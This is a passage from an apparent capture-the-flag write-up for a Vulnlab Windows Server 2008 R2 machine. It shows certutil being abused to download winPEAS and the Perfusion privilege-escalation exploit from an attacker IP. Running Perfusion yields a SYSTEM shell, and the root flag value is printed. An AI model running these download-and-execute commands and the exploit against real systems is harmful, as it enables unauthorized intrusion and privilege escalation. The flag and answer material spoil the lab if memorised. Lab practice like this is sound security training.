Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ldapreader>cd Downloads

C:\Users\ldapreader\Downloads>certutil.exe -urlcache -f http://10.8.2.19/winPEAS
x64.exe winPEASx64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

Check the output and crosscheck with common exploit against Windows Server 2008 R2:

Upload Perfusion:

C:\Users\ldapreader\Downloads>certutil.exe -urlcache -f http://10.8.2.19/Perfusion.exe perfusion.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

Then execute it to become nt authority\system then grab the Retro2_Root flag:

C:\Users\ldapreader\Downloads>certutil.exe -urlcache -f http://10.8.2.19/Perfusion.exe perfusion.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\ldapreader\Downloads>perfusion.exe -c cmd -i
[*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2008_1572_2.dll
[*] Created Performance registry key.
[*] Triggered Performance data collection.
[+] Exploit completed. Got a SYSTEM token! :)
[*] Waiting for the Trigger Thread to terminate... OK
[!] Failed to delete Performance registry key.
[*] Deleted Performance DLL.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ldapreader\Downloads>whoami
nt authority\system

C:\Users\ldapreader\Downloads>type c:\users\administrator\Desktop\root.txt
VL{fcdb35fa749e2e65fb16e69ed1d6a146}

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=c94d02ae-c5bc-4f2b-b8c0-bbe2effadbd3

GVQqhg6XUAE3OUj